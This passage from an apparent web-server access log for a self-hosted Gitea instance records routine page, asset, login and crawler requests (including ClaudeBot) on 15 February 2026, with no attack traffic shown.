GET https git.hanmocnn.co.kr "/" [Client 23.27.145.211] [Length 5677] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" -[15/Feb/2026:02:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 91.196.152.156] [Length 2138] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[15/Feb/2026:03:04:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:03:04:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "" "-" -[15/Feb/2026:03:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 216.73.216.188] [Length 5663] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:03:07:00 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 34.135.207.113] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36" "-" -[15/Feb/2026:03:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 34.135.207.113] [Length 5679] [Gzip 2.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36" "-" -[15/Feb/2026:03:12:47 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 34.221.113.203] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36" "-" -[15/Feb/2026:03:12:47 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 34.221.113.203] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 34.221.113.203] [Length 5681] [Gzip 2.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" "http://git.hanmocnn.co.kr" -[15/Feb/2026:03:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 34.221.113.203] [Length 5677] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36" "http://git.hanmocnn.co.kr" -[15/Feb/2026:03:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 144.217.163.247] [Length 5675] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.182 Safari/537.36" "-" -[15/Feb/2026:03:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 144.217.163.247] [Length 5679] [Gzip 2.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 13; Pixel 7 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.107 Mobile Safari/537.36" "-" -[15/Feb/2026:03:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 35.94.224.250] [Length 5665] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Safari/537.36" "-" -[15/Feb/2026:03:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 35.94.224.250] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Safari/537.36" "-" -[15/Feb/2026:03:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-auto.css?v=1.25.3" [Client 35.94.224.250] [Length 4323] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Safari/537.36" "-" -[15/Feb/2026:03:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 35.94.224.250] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Safari/537.36" "-" -[15/Feb/2026:03:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 35.94.224.250] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Safari/537.36" "-" -[15/Feb/2026:03:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 35.94.224.250] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Safari/537.36" "-" -[15/Feb/2026:03:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 35.94.224.250] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Safari/537.36" "-" -[15/Feb/2026:03:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 35.94.224.250] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Safari/537.36" "-" -[15/Feb/2026:03:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 35.94.224.250] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Safari/537.36" "-" -[15/Feb/2026:03:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 35.94.224.250] [Length 5665] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Mobile Safari/537.36" "-" -[15/Feb/2026:03:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 35.94.224.250] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Mobile Safari/537.36" "-" -[15/Feb/2026:03:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-auto.css?v=1.25.3" [Client 35.94.224.250] [Length 4323] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Mobile Safari/537.36" "-" -[15/Feb/2026:03:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 35.94.224.250] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Mobile Safari/537.36" "-" -[15/Feb/2026:03:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 35.94.224.250] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Mobile Safari/537.36" "-" -[15/Feb/2026:03:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 35.94.224.250] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Mobile Safari/537.36" "-" -[15/Feb/2026:03:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 35.94.224.250] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Mobile Safari/537.36" "-" -[15/Feb/2026:03:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 35.94.224.250] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Mobile Safari/537.36" "-" -[15/Feb/2026:03:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 35.94.224.250] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.67 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:55 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 211.234.204.1] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 11896] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 211.234.204.1] [Length 3036] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 211.234.204.1] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 211.234.204.1] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 211.234.204.1] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 211.234.204.1] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 211.234.204.1] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 211.234.204.1] [Length 4595] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 211.234.204.1] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 211.234.204.1] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 211.234.204.1] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 211.234.204.1] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 211.234.204.1] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:04:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 52.16.245.145] [Length 5678] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0" "-" -[15/Feb/2026:04:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 52.16.245.145] [Length 5664] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 52.16.245.145] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 52.16.245.145] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-auto.css?v=1.25.3" [Client 52.16.245.145] [Length 4323] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 52.16.245.145] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 52.16.245.145] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 52.16.245.145] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 52.16.245.145] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 52.16.245.145] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 52.16.245.145] [Length 5681] [Gzip 2.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36" "-" -[15/Feb/2026:04:24:16 +0000] - 301 301 - HEAD https git.hanmocnn.co.kr "/favicon.ico" [Client 52.16.245.145] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36" "-" -[15/Feb/2026:04:24:16 +0000] - 200 200 - HEAD https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 52.16.245.145] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36" "-" -[15/Feb/2026:04:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 52.16.245.145] [Length 4149] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36" "-" -[15/Feb/2026:04:27:43 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:04:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css" [Client 216.73.216.188] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:04:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/api/swagger" [Client 216.73.216.188] [Length 458] [Gzip 1.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:04:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos" [Client 216.73.216.188] [Length 6687] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:04:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/sign_up" [Client 216.73.216.188] [Length 4380] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:04:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-auto.css" [Client 216.73.216.188] [Length 4323] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:04:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js" [Client 216.73.216.188] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:04:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/licenses.txt" [Client 216.73.216.188] [Length 89511] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:04:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 216.73.216.188] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:04:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 216.73.216.188] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:04:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 216.73.216.188] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:04:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2F" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:04:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 3979] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[15/Feb/2026:04:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20188] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[15/Feb/2026:04:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 222.117.41.51] [Length 405163] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[15/Feb/2026:05:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 103.4.250.69] [Length 5663] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-auto.css?v=1.25.3" [Client 103.4.250.69] [Length 4323] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 103.4.250.69] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 103.4.250.69] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 103.4.250.69] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 103.4.250.69] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:15:45 +0000] 